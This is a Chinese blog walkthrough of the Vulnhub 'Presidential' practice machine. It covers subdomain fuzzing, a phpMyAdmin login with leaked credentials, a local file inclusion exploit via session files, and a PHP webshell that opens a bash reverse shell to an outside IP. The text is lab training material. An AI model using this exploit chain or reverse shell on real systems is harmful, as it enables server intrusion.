Presidential靶机

最新推荐文章于 2025-08-27 20:07:04 发布
最新推荐文章于 2025-08-27 20:07:04 发布
阅读量451 收藏
点赞数 3
CC 4.0 BY-SA版权
文章标签: 服务器 网络 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_78721909/article/details/140776400

一、通过扫描同段IP,得到靶机IP地址

开发的端口信息

 通过扫描目录,拼接目录没有发现信息

 

 但是找到了数据库敏感信息

二、通过观察页面,发现有个域名绑定的点

进行hosts绑定

进行域名访问

 

进行子域名爆破

试了好多种都不行,根据提示下载了个地址

wfuzz -H 'HOST:FUZZ.votenow.local' -u 'http://192.168.40.143' -w /home/kali/Desktop/SecLists-2024.2/Discovery/Web-Content/directory-list-2.3-medium.txt --hw 854,45 

 

成功爆出来一个子域名

三、进行hosts绑定子域名,访问

 

是个数据库登录页面,通过之前发现的数据库信息,登录

 

成功登录

通过查看页面,发现有个users表

 

解密密码,解不出来

查看数据库版本

 利用漏洞工具直接搜索相关漏洞

 kali: searchaploit phpmyadmin

找到相对应的版本

查看该文件路径,并且查看

locate 44928.txt

phpadmin执行sql语句

select '<?php phpinfo();exit;?>'

然后要找到执行命令的session值

 浏览器访问

http://datasafe.votenow.local/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_ls7k5tk0ham4ls298ad3sega9cjgesup

成功解析

将执行语句换成一句话木马

select '<?php system("bash -i >& /dev/tcp/47.99.195.123/5555 0>&1");exit;?>'

 浏览器重新访问

芜丶湖
关注
Vulnhub靶机PRESIDENTIAL_ 1
LainWith的博客
09-07 816
系列(此系列共1台)发布日期:2020年06月28日:只用爆破拿下靶机难度:中目标:取得 root 权限 + 2 Flag主机发现端口扫描信息收集子域名爆破phpmyadmin密码爆破本地文件包含本地权限漏洞SSH公钥认证。
Presidential靶机总结
qq_45301512的博客
01-29 929
靶机下载地址:打开靶机,使用nmap扫描出靶机的ip和所有开放的端口可以看到靶机开放了80端口和2082端口使用-sV参数查看详细服务80端口是http服务2082端口是ssh服务那么我们先根据80端口打开网站网站上没有发现可以利用的漏洞点,源代码也没有提示的信息那么我们进行信息收集,目录爆破一波并没有发现有用的信息我看网上目录爆破出一个config.php.bak文件,我这里可能是字典不行这是一个数据库的配置的备份文件。
vlunhub系列之presidential靶机
hanjinming110的博客
03-11 293
vlunhub系列之presidential靶机
Vulnhub靶机实战-PRESIDENTIAL
黑白的博客
01-10 1385
声明 好好学习,天天向上 搭建 vulnhub官网下载完镜像后,用vmware打开,遇到错误点击重试,即可,选择NAT后,直接就DHCP了 注意一点,vmware的兼容性,有问题,我用vmware,反弹shell和提权的时候,惨遭失败,一定要用oracle virtualbox,一定一定一定 vmware我用的桥接,virtualbox用的仅主机网卡#2,调了一下本机的网卡,调了半天,两边才能互相ping通 信我一句话,这非技术问题困了我好几天,弄不出来,vulnhub首页说建议用virtualbox,又说
Presidential靶机打靶过程及思路
qq_52610024的博客
06-22 446
4.在user表中得到账号密码,查看/README版本信息,为4.8.1,使用searcchsploit搜索4.8.1,5.使用刚才搜索到的文件包含漏洞,执行语句后,将获得的session值填入,发现phpinfo执行。访问到config.php.bak的页面源码的数据库账号与密码,ssh爆破失败。2.发现web页面存在子域名,绑定域名,用dirsearch进行子域名爆破,发现存在与一个rce,使用该脚本攻击目标域名,但是发现无法正常使用。打开查看到root账号的密码为密文,对该密码进行爆破失败。...
presidential-elections
04-01
TAMIDS 2021比赛
Presidential Challenge-开源
07-04
"总统挑战体能评分程序"是一个开源项目,旨在帮助用户输入和处理与总统挑战相关的体能测试数据。这个程序的设计和开发遵循了开源软件的原则,意味着源代码是公开的,任何人都可以查看、学习、修改,并根据需要分发。...
US-Presidential-Speech-Analysis
03-14
【标题】"US-Presidential-Speech-Analysis" 指的是一项针对美国总统演讲的数据分析项目。这样的项目通常涉及文本挖掘、自然语言处理(NLP)以及统计分析,旨在揭示不同总统在演讲中的语言风格、主题偏好以及演说对...
FiveThirtyEight Presidential Commencement Speeches-数据集
03-09
"FiveThirtyEight Presidential Commencement Speeches" 数据集,正如其名,是一个包含美国总统在毕业典礼上演讲的集合。这个数据集由知名的统计分析网站FiveThirtyEight发布,提供了764篇毕业演讲的详细信息,旨在...
us-presidential-2020-how-close
03-04
【标题】"us-presidential-2020-how-close" 指的是2020年美国总统选举的选情分析,可能包含对选举结果、各州投票情况、候选人支持率等关键数据的深入探究。 【描述】"2020年美国总统大选有多近?在查看分析" 提示...
【vulnhub】presidential1
开心星人的博客
07-06 980
因为靶机是host-only模式 我们将kali也设置为host-only模式 主机号太大或太小的丢掉,因为可能是网关之类的 所以靶机ip为192.168.110.128 看到有人名相关信息,之后可能需要用cwel assets目录,先看下 网站源码,看看有没有扫描敏感文件,感觉没有发现什么敏感文件cgi-bin目录403 访问一下config.php,确实有这个文件,但是为空 然后尝试会不会是备份文件config.phps 、config.php.bak 访问icons/README突然对di
Linux--->网络编程(TCP并发服务器构建:[ 多进程、多线程、select ])
2403_89873515的博客
08-27 913
单循环服务器:服务端同一时刻只能处理一个客户端的任务(TCP)并发服务器:服务端同一时刻可以处理多个客户端的任务(UDP)
GeoServer与GISBox:地理数据服务器对比解析
GISBox官方的日常分享
08-26 835
1、GeoServer是OpenGIS Web服务器规范的J2EE实现,允许用户发布地图数据,并对特征数据进行更新、删除和插入操作。它通过Web服务接口(如WMS、WFS、WCS)实现地理空间数据的共享与交互。2、GIS服务器(GIS Server)是用于发布、管理和共享地理空间数据的软件系统,属于地理信息服务体系的核心组件。它通过标准化接口(如OGC协议)实现空间数据的网络化服务,支持多用户并发访问和分布式计算。
Shell脚本-嵌套循环应用案例
qq_51626500的博客
08-24 870
Shell脚本-嵌套循环应用案例
SFTP服务器可以通过同一个登录到SFTP服务器的账号密码连接上控制台吗
qq_39666711的博客
08-27 144
对于基于 SSH 的 SFTP 服务,账号默认可能具有控制台连接能力,但也可能被管理员限制;对于独立的 SFTP 服务器软件,通常默认不支持通过 SFTP 账号密码连接控制台,少数情况可通过特定配置实现。如果不确定某个 SFTP 服务器是否支持,可以联系服务器管理员进行确认。
理智讨论可以将服务器内存占用限制到80%吗?
JttiSEO的博客
08-27 313
后者的需求倒是合理的,在很多企业级部署中,确实会要求业务应用最多用掉 70%-80%,留给系统和突发场景一定的余量。操作系统本身有复杂的调度机制,比如 Linux 内核会尽可能利用可用内存作为缓存和缓冲,哪怕你的应用实际只用到 40%,系统也可能显示 70%-80% 的占用。因此,如果仅仅想限制内存到 80%,首先要搞清楚“你想限制的是谁的 80%”:是应用层的,还是系统整体的。但实际上,涉及到的层面非常多,从操作系统内核,到应用程序的运行机制,再到虚拟化和容器化的资源调度,都可能影响最终的结果。
TCP 并发服务器构建
m0_66592645的博客
08-27 298
服务端同一时刻只能处理一个客户端的任务。:服务端同一时刻可以处理多个客户端的任务。
Fetch API 请求的来龙去脉:从浏览器到服务器的完整流程
lpfasd123的博客
08-26 1051
Fetch API 是一个现代、基于Promise的HTTP请求接口,它提供了比传统的XMLHttpRequest更强大和灵活的功能。// 基本语法// 使用async/await的现代写法try {Fetch API 是现代Web开发中不可或缺的工具,理解其工作原理对于构建高质量的Web应用至关重要。
Linux 服务器故障全解析:常见问题及处理方法大全
SonderCloud_的博客
08-27 678
实际使用中,Linux 服务器难免会出现各类故障,这些故障可能由多种因素引发,比如 DNS 解析问题、CPU 过载、高 I/O 等待时间、内存异常等。对系统管理员来说,一旦服务器出现故障,不仅可能影响业务正常运转,还可能造成数据丢失或服务中断,因此快速定位故障原因并掌握有效的处理方法,是必备的核心能力。接下来,本文会梳理 Linux 服务器中常见的故障类型,逐一分析每种故障的典型原因,并提供具体可操作的处理步骤,为运维工作提供实用参考。
Linux 软件编程(十二)网络编程:TCP 并发服务器构建与 IO 多路复用
最新发布
2302_80202237的博客
08-27 612
多进程模型资源开销大但安全;多线程模型轻量但需注意同步;线程池模型优化线程资源管理,适配高频任务场景;IO 多路复用(selectpollepoll)让单进程实现多fd监测,高效处理并发连接。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值